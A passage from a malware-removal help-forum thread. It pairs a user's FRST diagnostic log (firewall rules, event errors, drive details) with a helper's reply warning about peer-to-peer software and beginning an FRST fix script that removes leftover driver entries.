FirewallRules: [{6078CE2E-0B79-4B93-A350-F643B1D40340}] => (Allow) C:\Program Files\Nexus Mod Manager\NexusClient.exe
FirewallRules: [{D99E7FAD-F214-4746-A162-7E71335EA9EB}] => (Allow) C:\Program Files\Nexus Mod Manager\NexusClient.exe
FirewallRules: [TCP Query User{7C99F9CA-DBD3-4684-B0D8-2C3F1F82CAA4}F:\games\divinity original sin 2\bin\eocapp.exe] => (Allow) F:\games\divinity original sin 2\bin\eocapp.exe
FirewallRules: [UDP Query User{DCD3D02D-138F-4BDD-B2BD-764252E127C9}F:\games\divinity original sin 2\bin\eocapp.exe] => (Allow) F:\games\divinity original sin 2\bin\eocapp.exe
FirewallRules: [{3794FD8A-8DAD-42DE-8232-4F85AE412E35}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7C361E2E-FF31-4315-AF41-A5F698A186AD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{CE045AE6-17A5-447A-AEA9-C6704EA58365}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{818607AC-0C05-4BC2-A8AB-C36785942C7E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{8F38296E-6EB7-4BE5-A9B4-3A827146C9FC}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{2326BAC4-D6C8-44BB-9D14-C3C38ABC5370}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{6B401CD0-2417-4969-87AE-F36D85CF1FDC}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{A178CFBB-E0D8-4C65-ADFB-C2D2262D5B31}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{FC38FBD7-265E-4530-AD59-40835C97A79C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{C4B563DA-AB91-4709-B091-E19741CE9D1A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{EE43546A-E249-4E6F-99EF-29A58803129A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{2A709177-46CD-4EC7-9E27-1746DD2571A5}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{4A574DE0-77BB-4D2C-80ED-5E6E37F0451C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{0F5946F7-5D76-42B6-9D41-1C4ECA044011}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{1FE677C7-E5F7-4AC9-9569-33AA7F92D640}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{C08CD677-D6EC-4884-9D61-F5A4A1451237}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [TCP Query User{E380F1FF-E610-44C1-BE38-78D7F9161A87}C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe] => (Block) C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [UDP Query User{C9D2A49F-DF9D-4446-AEDD-2608F95499B6}C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe] => (Block) C:\program files (x86)\steam\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [TCP Query User{98F2827D-C85B-4294-A084-2A3EC907FA9A}F:\games\steamlibrary\steamapps\common\fallout 4\creationkit.exe] => (Allow) F:\games\steamlibrary\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [UDP Query User{6D21133F-BD5D-41D5-A4E9-172DCD672AC2}F:\games\steamlibrary\steamapps\common\fallout 4\creationkit.exe] => (Allow) F:\games\steamlibrary\steamapps\common\fallout 4\creationkit.exe
FirewallRules: [{9F0ECF3E-8417-4FC0-A60E-E03B7B2CEAF7}] => (Allow) F:\Games\SteamLibrary\steamapps\common\War Thunder\launcher.exe
FirewallRules: [{E06CCCFA-30AB-460B-BB18-B046301C87A6}] => (Allow) F:\Games\SteamLibrary\steamapps\common\War Thunder\launcher.exe
FirewallRules: [TCP Query User{0999E2BF-F981-4CE7-B481-CC85BBDA17BD}F:\games\steamlibrary\steamapps\common\war thunder\win64\aces.exe] => (Allow) F:\games\steamlibrary\steamapps\common\war thunder\win64\aces.exe
FirewallRules: [UDP Query User{76E07B75-63A6-45EA-B92A-A4A337FD76CA}F:\games\steamlibrary\steamapps\common\war thunder\win64\aces.exe] => (Allow) F:\games\steamlibrary\steamapps\common\war thunder\win64\aces.exe
FirewallRules: [{FA935A1E-26CD-4BE3-9E01-7637EAB7CA2D}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Wolfenstein.The.New.Order\WolfNewOrder_x64.exe
FirewallRules: [{BDAA4673-2E10-40FE-87E1-C1929C642E53}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Wolfenstein.The.New.Order\WolfNewOrder_x64.exe
FirewallRules: [{0D762826-EB6E-4BAB-A137-4BB64D8AC037}] => (Allow) F:\Program Files (x86)\Crazybump\CrazyBump.exe
FirewallRules: [{46CAFC6B-5452-457F-97C0-20A51DEA6D5D}] => (Allow) F:\Program Files (x86)\Crazybump\CrazyBump.exe
FirewallRules: [TCP Query User{90E26D47-2E43-4E54-A6D4-3A76586E344D}F:\games\sniper elite 4\bin\sniperelite4_dedicated.exe] => (Allow) F:\games\sniper elite 4\bin\sniperelite4_dedicated.exe
FirewallRules: [UDP Query User{252B8B23-9510-4871-A844-3A19AE106DF6}F:\games\sniper elite 4\bin\sniperelite4_dedicated.exe] => (Allow) F:\games\sniper elite 4\bin\sniperelite4_dedicated.exe
FirewallRules: [TCP Query User{6585F36D-A1DB-402C-AD6C-2DD1C70A0DEE}F:\download games\xcom 2\binaries\win64\xcom2.exe] => (Block) F:\download games\xcom 2\binaries\win64\xcom2.exe
FirewallRules: [UDP Query User{AE19993A-43FC-4B98-8FD7-4EED28FEA695}F:\download games\xcom 2\binaries\win64\xcom2.exe] => (Block) F:\download games\xcom 2\binaries\win64\xcom2.exe
FirewallRules: [{7C7AE1ED-6DED-43B2-9210-4593DB9B3F34}] => (Allow) C:\Program Files\Opera\49.0.2725.47\opera.exe
FirewallRules: [{AEBE5C5B-CF09-4386-B65F-02254B8DB946}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DARK SOULS III\Game\DarkSoulsIII.exe
FirewallRules: [{56E39D01-EDDE-4406-A7DA-99FADF606713}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DARK SOULS III\Game\DarkSoulsIII.exe
FirewallRules: [{F210BAA1-2177-4CCA-91C6-46693421F1E8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\XCom-Enemy-Unknown\Binaries\Win32\XComGame.exe
FirewallRules: [{2F6F4304-14A5-4857-B21F-2A0CEC4E405C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\XCom-Enemy-Unknown\Binaries\Win32\XComGame.exe
FirewallRules: [{7E4EE891-1FB6-4458-9FD8-5EEAB01EF70C}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Magic Duels\MagicDuels.exe
FirewallRules: [{AEF2C244-F95D-4781-9618-404F15FEB97F}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Magic Duels\MagicDuels.exe
FirewallRules: [{77FD5D48-4235-4F63-BF2B-B2E641BD6B1A}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Black Squad\binaries\win32\SteamLauncher.exe
FirewallRules: [{3DB3E0F4-B592-4A6E-8E6E-45F3559FB0C3}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Black Squad\binaries\win32\SteamLauncher.exe
FirewallRules: [TCP Query User{253C0839-3630-4446-A13C-BE687D884D03}F:\program files\matlab\r2017a\bin\win64\matlab.exe] => (Block) F:\program files\matlab\r2017a\bin\win64\matlab.exe
FirewallRules: [UDP Query User{7B1C121C-3E09-4A03-B173-198782809DAE}F:\program files\matlab\r2017a\bin\win64\matlab.exe] => (Block) F:\program files\matlab\r2017a\bin\win64\matlab.exe
FirewallRules: [{F96A0828-B26B-4235-9670-F8D65BD5710F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{1EA35676-AA0F-4F6D-A3F5-7BF8F6214C81}] => (Allow) F:\Program Files (x86)\Origin Games\Spore\Sporebin\SporeApp.exe
FirewallRules: [{C5293452-5544-4B43-B552-028C4CB7A9EC}] => (Allow) F:\Program Files (x86)\Origin Games\Spore\Sporebin\SporeApp.exe
FirewallRules: [{060D3A43-E54C-4A6F-B2F5-69DC96DA17AD}] => (Allow) F:\Program Files (x86)\Origin Games\Plants vs. Zombies\PlantsVsZombies.exe
FirewallRules: [{DAFD2333-B8AC-44F8-98F6-164334978518}] => (Allow) F:\Program Files (x86)\Origin Games\Plants vs. Zombies\PlantsVsZombies.exe
FirewallRules: [TCP Query User{67659BC8-DEDE-46BD-94C7-A4C855E0E896}F:\games\steamlibrary\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe] => (Allow) F:\games\steamlibrary\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{3BC627BA-D8FA-4156-B684-73B49B0CE6A2}F:\games\steamlibrary\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe] => (Allow) F:\games\steamlibrary\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{21656332-4E57-421D-B414-595C5A8A7CF8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{877ACAFF-423B-47EC-BC21-676FD68BF04D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{386E7FCD-5E43-4D6E-944A-BA43C5E35E2F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{7363C606-4C7A-46F3-A6E2-F682272E8A09}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [TCP Query User{B9CC892D-CBC7-4491-9501-CD76C028EB70}F:\games\gauntlet\binaries\gauntlet.exe] => (Allow) F:\games\gauntlet\binaries\gauntlet.exe
FirewallRules: [UDP Query User{BF04B010-6EC8-4EF2-8A4D-1ECE6635E18B}F:\games\gauntlet\binaries\gauntlet.exe] => (Allow) F:\games\gauntlet\binaries\gauntlet.exe
FirewallRules: [{E26239D1-663F-4582-9B9B-B9E4A66E44BB}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{8EA39488-49CA-402A-A187-2D2BEFB34D12}] => (Allow) F:\Games\SteamLibrary\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{89B622F3-3265-4389-AB68-E53E8C449E78}] => (Allow) D:\SteamLibrary HDD\steamapps\common\ARK Survival Evolved Dedicated Server\ShooterGame\Binaries\Win64\ShooterGameServer.exe
FirewallRules: [{C63D1ECD-1104-4A26-84E7-FEF82D309F56}] => (Allow) D:\SteamLibrary HDD\steamapps\common\ARK Survival Evolved Dedicated Server\ShooterGame\Binaries\Win64\ShooterGameServer.exe
FirewallRules: [{735CE4C8-7E10-4E7E-AFDF-B2886CE118A0}] => (Allow) D:\SteamLibrary HDD\steamapps\common\ARK Survival Evolved Dedicated Server\ShooterGame\Binaries\Win64\ShooterGameServer.exe
FirewallRules: [{22AF6734-B619-4EF4-A5F6-B59823F28622}] => (Allow) D:\SteamLibrary HDD\steamapps\common\ARK Survival Evolved Dedicated Server\ShooterGame\Binaries\Win64\ShooterGameServer.exe
FirewallRules: [{4A9A7F62-9BFD-4EF0-AE3A-4C9222C5ECBD}] => (Allow) C:\Program Files\Opera\49.0.2725.64\opera.exe
FirewallRules: [{A63BA824-7742-453D-B20F-E15E1775D444}] => (Allow) F:\Games\SteamLibrary\steamapps\common\insurgency2\insurgency_BE.exe
FirewallRules: [{BD26008E-3FA3-49E2-BD79-944DB4EC4976}] => (Allow) F:\Games\SteamLibrary\steamapps\common\insurgency2\insurgency_BE.exe
FirewallRules: [TCP Query User{71A7F12C-D49A-41FC-A3EA-E43A72876401}F:\games\steamlibrary\steamapps\common\insurgency2\insurgency.exe] => (Allow) F:\games\steamlibrary\steamapps\common\insurgency2\insurgency.exe
FirewallRules: [UDP Query User{C626AB03-E07A-49BE-81BA-27F903FE6D72}F:\games\steamlibrary\steamapps\common\insurgency2\insurgency.exe] => (Allow) F:\games\steamlibrary\steamapps\common\insurgency2\insurgency.exe
FirewallRules: [{478F40C6-B192-4563-8DEF-92BDBC666B49}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [{623A403D-8D08-4A3D-AD55-9B543CD1D371}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [TCP Query User{81A18AD1-1591-43A5-8B4F-88363EB6DBBB}F:\games\joguinhos merda\vagante b58\vagante\vagante.exe] => (Allow) F:\games\joguinhos merda\vagante b58\vagante\vagante.exe
FirewallRules: [UDP Query User{AB9D8834-7B5B-400E-95CD-BF2C9E25E089}F:\games\joguinhos merda\vagante b58\vagante\vagante.exe] => (Allow) F:\games\joguinhos merda\vagante b58\vagante\vagante.exe
FirewallRules: [{0880EF96-5242-4DD9-8B1D-EEB2B2DAAB0B}] => (Allow) F:\Games\Star Wars-The Old Republic\launcher.exe
FirewallRules: [{943B9236-B3E9-4198-A33C-9B53C4B6B195}] => (Allow) F:\Games\Star Wars-The Old Republic\launcher.exe
FirewallRules: [{50772711-424B-4182-8857-8097573CB779}] => (Allow) F:\Games\Star Wars-The Old Republic\launcher.exe
FirewallRules: [{266882BE-1950-4A64-A45F-D8845763536E}] => (Allow) F:\Games\Star Wars-The Old Republic\launcher.exe
FirewallRules: [{62F8F72A-2CF0-4E56-AAFC-8C8E15E610AA}] => (Allow) F:\Games\SteamLibrary\steamapps\common\AdVenture Capitalist\adventure-capitalist.exe
FirewallRules: [{F3DF8234-AC7F-42DA-9F8A-1837AEB68ED8}] => (Allow) F:\Games\SteamLibrary\steamapps\common\AdVenture Capitalist\adventure-capitalist.exe
FirewallRules: [{71121149-161D-4B53-BB41-8D5385C630AB}] => (Allow) F:\Games\SteamLibrary\steamapps\common\IdleChampions\IdleDragons.exe
FirewallRules: [{D7B418E8-DD7A-43DF-97B2-AFB45DCE4BA5}] => (Allow) F:\Games\SteamLibrary\steamapps\common\IdleChampions\IdleDragons.exe
FirewallRules: [{92E3EA7F-D8AC-464C-84C3-C5EE287B8FA2}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Crusader Kings II\CK2game.exe
FirewallRules: [{8B5E7DC6-2EF7-4F22-860A-057B4BF02011}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Crusader Kings II\CK2game.exe
FirewallRules: [{1BEAC9C1-9AEC-48C3-8459-A2B239E4E17B}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Europa Universalis IV\eu4.exe
FirewallRules: [{BAC4F4D2-2727-43D3-8ACC-5870EC987752}] => (Allow) F:\Games\SteamLibrary\steamapps\common\Europa Universalis IV\eu4.exe
 
==================== Restore Points =========================
 
21-12-2017 15:27:46 Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008
21-12-2017 15:28:01 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215
21-12-2017 15:28:12 Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008
21-12-2017 15:28:23 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
28-12-2017 02:36:06 Ponto de verificação por HitmanPro
28-12-2017 02:42:49 Ponto de verificação por HitmanPro
 
==================== Faulty Device Manager Devices =============
 
Name: TAP-Windows Adapter V9
Description: TAP-Windows Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-Windows Provider V9
Service: tap0901
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (12/28/2017 03:34:14 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (12/28/2017 03:22:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (12/28/2017 04:09:19 AM) (Source: MsiInstaller) (EventID: 11406) (User: Sblck-PC)
Description: Product: Sophos AutoUpdate -- Error 1406.Could not write value Sophos AutoUpdate Monitor to key \SOFTWARE\Microsoft\Windows\CurrentVersion\Run.  System error .  Verify that you have sufficient access to that key, or contact your support personnel.
 
Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x0000021c,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,000000000234F140.72).  hr = 0x80070005, Access is denied.
.
 
Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000858,(null),0,REG_BINARY,000000000258DDB0.72).  hr = 0x80070005, Access is denied.
.
 
 
Operation:
   BackupShutdown Event
 
Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {075b1717-b504-4da1-a1e4-fcc983abe7ec}
 
Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001d0,SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer,0,REG_BINARY,00000000035AEEE0.72).  hr = 0x80070005, Access is denied.
.
 
 
Operation:
   BackupShutdown Event
 
Context:
   Execution Context: Writer
   Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485}
   Writer Name: Registry Writer
   Writer Instance ID: {d7c9ec6a-cc04-4aab-8077-c74f344303d9}
 
Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000210,SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer,0,REG_BINARY,000000000352EAB0.72).  hr = 0x80070005, Access is denied.
.
 
 
Operation:
   BackupShutdown Event
 
Context:
   Execution Context: Writer
   Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
   Writer Name: Shadow Copy Optimization Writer
   Writer Instance ID: {dc6b6e4e-0397-4007-8b95-903648135756}
 
Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000858,(null),0,REG_BINARY,000000000258DDB0.72).  hr = 0x80070005, Access is denied.
.
 
 
Operation:
   BackupShutdown Event
 
Context:
   Execution Context: Writer
   Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
   Writer Name: WMI Writer
   Writer Instance ID: {075b1717-b504-4da1-a1e4-fcc983abe7ec}
 
Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001dc,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,0000000001C4EE00.72).  hr = 0x80070005, Access is denied.
.
 
 
Operation:
   BackupShutdown Event
 
Context:
   Execution Context: Writer
   Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f}
   Writer Name: COM+ REGDB Writer
   Writer Instance ID: {21ad5c2e-d548-4236-8e90-3e5243023075}
 
Error: (12/28/2017 02:42:57 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001d0,SYSTEM\CurrentControlSet\Services\VSS\Diag\Registry Writer,0,REG_BINARY,00000000035AEEE0.72).  hr = 0x80070005, Access is denied.
.
 
 
Operation:
   BackupShutdown Event
 
Context:
   Execution Context: Writer
   Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485}
   Writer Name: Registry Writer
   Writer Instance ID: {d7c9ec6a-cc04-4aab-8077-c74f344303d9}
 
 
System errors:
=============
Error: (12/28/2017 03:58:57 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140993535
 
Error: (12/28/2017 03:58:57 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140993535
 
Error: (12/28/2017 03:58:57 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140993535
 
Error: (12/28/2017 03:58:57 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140993535
 
Error: (12/28/2017 03:58:57 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630801.
 
Error: (12/28/2017 03:58:57 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630801.
 
Error: (12/28/2017 03:58:46 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error: 
%%-2140993535
 
Error: (12/28/2017 03:58:46 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error: 
%%-2140993535
 
Error: (12/28/2017 03:58:46 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630801.
 
Error: (12/28/2017 03:33:30 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 and APPID 
{344ED43D-D086-4961-86A6-1106F4ACAD9B}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
 
 
CodeIntegrity:
===================================
  Date: 2017-12-28 02:40:16.109
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:40:16.029
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:40:15.969
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:40:15.889
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:40:15.809
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:40:15.749
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\ProgramData\ESET\ESET NOD32 Antivirus\Updfiles\base_nonnups\nod4AB6.dll.nup.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:33:03.729
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\ESET\ESET NOD32 Antivirus\Modules\em023_64\9673\em023_64.dll.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:33:03.649
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\ESET\ESET NOD32 Antivirus\Modules\em023_64\9673\em023_64.dll.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:33:03.589
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\ESET\ESET NOD32 Antivirus\Modules\em023_64\9673\em023_64.dll.raw because the set of per-page image hashes could not be found on the system.
 
  Date: 2017-12-28 02:33:03.518
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\ESET\ESET NOD32 Antivirus\Modules\em023_64\9673\em023_64.dll.raw because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-2600K CPU @ 3.40GHz
Percentage of memory in use: 24%
Total physical RAM: 24543.14 MB
Available physical RAM: 18599.78 MB
Total Virtual: 24741.32 MB
Available Virtual: 19527.43 MB
 
==================== Drives ================================
 
Drive c: (SSD) (Fixed) (Total:232.4 GB) (Free:31.12 GB) NTFS
Drive d: (HDD 500GB) (Fixed) (Total:465.76 GB) (Free:140.99 GB) NTFS
Drive f: (Mass Storage) (Fixed) (Total:1863.01 GB) (Free:354.8 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 9E858FBD)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 991D8B9F)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.4 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 6D231126)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#12 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,416 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:06 PM

Posted 28 December 2017 - 08:47 PM

Thank you.

Please consider and do this.

===================================================

Peer to Peer (P2P) Warning

--------------------

Going over your logs I noticed that you have Peer 2 Peer (torrent) program(s) installed. It is pretty much certain that if you continue to use P2P programs, you will get infected again.
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a smörgåsbord of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
I would recommend that you uninstall Peer 2 Peer programs, however that choice is up to you. If you choose to remove the program, you can do so via Start > Control Panel > Add/Remove Programs.

If you are still leaning toward using this program, please take a look at this information about CryptoLocker Ransomware, a type of Ransomware which can be delivered via P2P file transfers. The newest variation of Ransomware can make it impossible to recover the files this malicious software encrypts. In other words, you will probably lose most if not all of your valuable information, including pictures. In addition it has recently been reported that P2P downloads may be tracked resulting in your IP address being monitored by copyright authorities.

If you wish to keep it, please do not use it until we are completely done and your machine is determined to be clean and updated.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Right click on the FRST icon and select Run as administrator
  • Highlight the below information then hit the Ctrl + C keys at the same time
Start::
CreateRestorePoint:
CloseProcesses:
R3 ALSysIO; \??\C:\Users\Sblck\AppData\Local\Temp\ALSysIO64.sys 
S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys
S3 GLCKIO; \??\C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\9\INTEL3~1\690b33e1-0462-4e84-9bea-c7552b45432a.sys
S3 PORTMON; \??\C:\Users\Sblck\Desktop\SysinternalsSuite\PORTMSYS.SYS
S3 VBAudioVACAMME; system32\DRIVERS\vbaudio_cablea64_win7.sys
S3 VBAudioVACBMME; system32\DRIVERS\vbaudio_cableb64_win7.sys
